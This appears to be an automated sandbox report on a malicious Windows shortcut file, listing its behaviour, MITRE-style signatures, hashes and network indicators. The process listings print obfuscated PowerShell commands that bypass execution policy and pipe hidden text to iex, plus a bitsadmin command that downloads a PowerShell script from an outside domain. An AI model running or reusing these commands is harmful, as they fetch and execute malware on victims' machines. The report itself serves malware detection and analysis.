Analysis Overview
SHA256
8d7de3083012dd352a020eee216a6acdf08aed1a1f69cce481f7353274e4c82c
Threat Level: Likely malicious
The file a11a90303a1542f465542239afc4ea60_JaffaCakes118 was found to be: Likely malicious.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Enumerates physical storage devices
Download via BitsAdmin
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-12 15:10
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-12 15:10
Reported
2024-06-12 15:12
Platform
win10v2004-20240508-en
Max time kernel
147s
Max time network
150s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\a11a90303a1542f465542239afc4ea60_JaffaCakes118.lnk
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -eP ByPass -nonI -c "&{powershell -wi"N "hi"dDen -c {$b7oc=findstr /s mrildkpased c:\users\*.lnk; "$b7oc" | iex}}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -wiN hidDen -encodedCommand JABiADcAbwBjAD0AZgBpAG4AZABzAHQAcgAgAC8AcwAgAG0AcgBpAGwAZABrAHAAYQBzAGUAZAAgAGMAOgBcAHUAcwBlAHIAcwBcACoALgBsAG4AawA7ACAAJABiADcAbwBjACAAfAAgAGkAZQB4AA== -inputFormat xml -outputFormat text
C:\Windows\system32\findstr.exe
"C:\Windows\system32\findstr.exe" /s mrildkpased c:\users\*.lnk
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /C echo 1 > C:\Users\Admin\AppData\Roaming\\d & bitsadmin /transfer mrildkpased /download /priority FOREGROUND "https://internetmarketing4pros.com/marco/pro" C:\Users\Admin\AppData\Roaming\\vWjXOBtIxaArTN.ps1 & del C:\Users\Admin\AppData\Roaming\\d & exit
C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer mrildkpased /download /priority FOREGROUND "https://internetmarketing4pros.com/marco/pro" C:\Users\Admin\AppData\Roaming\\vWjXOBtIxaArTN.ps1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | internetmarketing4pros.com | udp |
| US | 8.8.8.8:53 | internetmarketing4pros.com | udp |
Files
memory/664-2-0x00007FF84DBE3000-0x00007FF84DBE5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qlcftper.bt5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/664-12-0x00000285713C0000-0x00000285713E2000-memory.dmp
memory/664-13-0x00007FF84DBE0000-0x00007FF84E6A1000-memory.dmp
memory/664-14-0x00007FF84DBE0000-0x00007FF84E6A1000-memory.dmp
memory/664-25-0x00007FF84DBE0000-0x00007FF84E6A1000-memory.dmp
memory/664-26-0x00007FF84DBE0000-0x00007FF84E6A1000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-12 15:10
Reported
2024-06-12 15:12
Platform
win7-20240221-en
Max time kernel
119s
Max time network
119s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\a11a90303a1542f465542239afc4ea60_JaffaCakes118.lnk
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -eP ByPass -nonI -c "&{powershell -wi"N "hi"dDen -c {$b7oc=findstr /s mrildkpased c:\users\*.lnk; "$b7oc" | iex}}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -wiN hidDen -encodedCommand JABiADcAbwBjAD0AZgBpAG4AZABzAHQAcgAgAC8AcwAgAG0AcgBpAGwAZABrAHAAYQBzAGUAZAAgAGMAOgBcAHUAcwBlAHIAcwBcACoALgBsAG4AawA7ACAAJABiADcAbwBjACAAfAAgAGkAZQB4AA== -inputFormat xml -outputFormat text
C:\Windows\system32\findstr.exe
"C:\Windows\system32\findstr.exe" /s mrildkpased c:\users\*.lnk
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /C echo 1 > C:\Users\Admin\AppData\Roaming\00000000-0000-0000-0000-000000000000\d & bitsadmin /transfer mrildkpased /download /priority FOREGROUND "https://internetmarketing4pros.com/marco/pro" C:\Users\Admin\AppData\Roaming\00000000-0000-0000-0000-000000000000\AxHMdTVikEOCgb.ps1 & del C:\Users\Admin\AppData\Roaming\00000000-0000-0000-0000-000000000000\d & exit
C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer mrildkpased /download /priority FOREGROUND "https://internetmarketing4pros.com/marco/pro" C:\Users\Admin\AppData\Roaming\00000000-0000-0000-0000-000000000000\AxHMdTVikEOCgb.ps1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | internetmarketing4pros.com | udp |
Files
memory/2612-38-0x000007FEF55BE000-0x000007FEF55BF000-memory.dmp
memory/2612-39-0x000000001B6D0000-0x000000001B9B2000-memory.dmp
memory/2612-41-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp
memory/2612-42-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp
memory/2612-43-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp
memory/2612-40-0x0000000001F30000-0x0000000001F38000-memory.dmp
memory/2612-44-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp
memory/2612-45-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp
memory/2612-51-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp
memory/2612-52-0x000007FEF55BE000-0x000007FEF55BF000-memory.dmp